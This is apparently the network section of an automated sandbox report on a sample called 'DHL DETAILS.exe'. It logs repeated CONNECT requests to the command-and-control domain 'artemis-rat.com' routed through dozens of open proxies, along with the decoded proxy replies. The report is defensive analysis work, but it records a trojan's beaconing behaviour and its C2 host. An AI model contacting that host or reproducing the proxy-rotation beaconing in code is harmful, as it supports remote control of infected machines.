                                                                                    Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                    Data Ascii: ERR_ACCESS_DENIED


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1433192.168.2.55421345.43.81.4456916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.046538115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.447930098 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1434192.168.2.552916206.81.31.215806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.049905062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1435192.168.2.554352148.72.23.56361116352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.076648951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.723896980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1436192.168.2.5528435.10.249.15910806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.082338095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1437192.168.2.554187119.23.148.173806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.083252907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1438192.168.2.55434694.131.59.241583786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.091543913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1439192.168.2.552821195.35.20.90806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.091650009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.223822117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.333301067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.334757090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1440192.168.2.55411493.171.220.22988886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.100189924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1441192.168.2.554195118.184.157.111806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.100601912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.447747946 CET321INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty/1.21.4.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 163
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1442192.168.2.553676167.71.5.8380806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.113056898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.422422886 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1443192.168.2.554403172.67.181.126806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.113282919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.268778086 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1444192.168.2.55424218.166.142.18010806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.113804102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1445192.168.2.554192103.156.17.15380806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.113804102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.185894012 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1446192.168.2.553693165.232.158.6031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.122840881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.177022934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.270714998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.271361113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1447192.168.2.5542448.217.143.187156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.123898029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.915486097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1448192.168.2.55417964.43.89.8263416352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.124435902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.712611914 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1449192.168.2.554315217.23.11.194327086352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.141690969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.446611881 CET226INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Length: 101
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a
                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                                                                                    Mar 9, 2024 13:14:20.265551090 CET226INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Length: 101
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a
                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1450192.168.2.554309185.100.233.101411386352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.141784906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.447165012 CET226INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Length: 101
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a
                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                                                                                    Mar 9, 2024 13:14:20.287691116 CET226INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Length: 101
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a
                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1451192.168.2.554311161.35.83.25131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.142129898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.915484905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1452192.168.2.55441867.201.59.7041456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.161082029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1453192.168.2.55432547.100.207.11780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.190948963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.500801086 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1454192.168.2.55434289.168.121.17531286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.191340923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1455192.168.2.5543448.211.4.215806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.191633940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.833693027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1456192.168.2.554239185.191.236.16231286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.192847013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
